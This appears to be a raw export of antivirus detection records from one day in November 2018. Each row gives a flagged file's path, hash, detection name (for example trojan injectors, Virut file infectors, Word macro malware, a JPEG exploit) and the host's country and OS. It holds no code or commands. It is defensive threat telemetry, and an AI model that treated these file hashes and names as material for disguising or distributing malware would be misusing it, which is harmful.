  Row(detection=Row(filename='avscan-20181102-061222-3b5996d1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061222-3B5996D1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054204-ff83c10f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054204-FF83C10F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-130012-17a99561', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-130012-17A99561', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:03:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00001ff5', filepath='C:\\Windows\\Temp\\tmp0000010e\\tmp00001ff5', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T17:53:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00001e8a', filepath='C:\\Windows\\Temp\\tmp0000010e\\tmp00001e8a', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T17:46:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051535-4c54157b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051535-4C54157B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061404-781d6ea9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061404-781D6EA9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-113558-2c186168', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b11dd2e7\\AVSCAN-20181102-113413-1EA1366C\\AVSCAN-20181102-113558-2C186168', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='MG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:36:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qeeamfrs.exe', filepath='F:\\RECYCLER\\S-1-5-12-2772410451-1313380861-030382565-1358\\qeEaMfRS.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='48865df4239b115f603b0ee3344dc0f61cebbd06250cd75c0e79bd11456bb0f5', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\UsbFix\\UsbFix.exe', parentsize=1999504, timestamp='2018-11-02T16:03:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-185716-c4be0f94', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_517b9285\\AVSCAN-20181102-185511-B34883EA\\AVSCAN-20181102-185716-C4BE0F94', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T17:57:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061254-4e650e05', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061254-4E650E05', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pdf_contract agreement.tar --> j111.exe', filepath='pdf_CONTRACT AGREEMENT.tar --> J111.exe', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T16:28:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='blorwtua.exe', filepath='f:\\recycler\\s-7-5-57-0134166447-0306465866-823005636-0523\\bLorWTUA.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:26:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053216-a13d8f11', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053216-A13D8F11', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052233-459b9915', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052233-459B9915', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131824-6bc86c1c', filepath='C:\\ProgramData\\Avira\\AntiVir Desktop\\TEMP\\AvGuardIA_51872ac9\\AVSCAN-20181102-131435-4A8E2D71\\AVSCAN-20181102-131824-6BC86C1C', filesize=64000, name='TR/Agent.micws.#M1.#R1'), hash='604898f36af3c8a3ba421d9bf9b5c4156ac28127357a809aca38611edb5d6db9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T12:18:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050341-a3072c04', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050341-A3072C04', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051530-49dba266', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051530-49DBA266', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052102-0f3e9c13', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052102-0F3E9C13', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055206-663d60fe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055206-663D60FE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052441-921d3e8d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052441-921D3E8D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060615-60afb4f3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060615-60AFB4F3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053622-33e0f4db', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053622-33E0F4DB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060244-e2fa2c50', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060244-E2FA2C50', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050959-847ec51a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050959-847EC51A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053419-eaac8fff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053419-EAAC8FFF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052420-853a0829', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052420-853A0829', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053257-b99ffd96', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053257-B99FFD96', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062621-2f82a422', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062621-2F82A422', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061134-1eaef1c9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061134-1EAEF1C9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054754-d083f6ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054754-D083F6AC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060852-be450b31', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060852-BE450B31', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054655-ad33047f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054655-AD33047F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062507-032fc837', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062507-032FC837', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051820-af11ae87', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051820-AF11AE87', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053843-87bece7e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053843-87BECE7E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060351-0ad1b8de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060351-0AD1B8DE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060532-4713582f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060532-4713582F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053838-85023266', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053838-85023266', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055505-d1527cea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055505-D1527CEA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050413-b5f9cc4a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050413-B5F9CC4A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052606-c47a8633', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052606-C47A8633', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061613-c4c733ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061613-C4C733AC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mhx-xs.exe', filepath='E:\\العاب\\الفراخ الطائرة\\MHX-XS.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='899a25541436668a866ed88a2007ddf00100692d1f0f2bd99364d68a2c949729', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T13:55:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T15:41:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T15:01:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051143-c2026437', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051143-C2026437', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcoded_000', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\Transcoded_000', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='8a09a30645885737b1b40007c9da1460bfcebb22fa369cf17f9de8f8efe37345', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T09:48:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054319-2c3790ad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054319-2C3790AD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050511-d8616f46', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050511-D8616F46', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054409-49f98e25', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054409-49F98E25', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054114-e1b54799', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054114-E1B54799', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054144-f39fad6e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054144-F39FAD6E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062137-86520742', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062137-86520742', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:36Z'), dt=datetime.date(2018, 11, 2)),
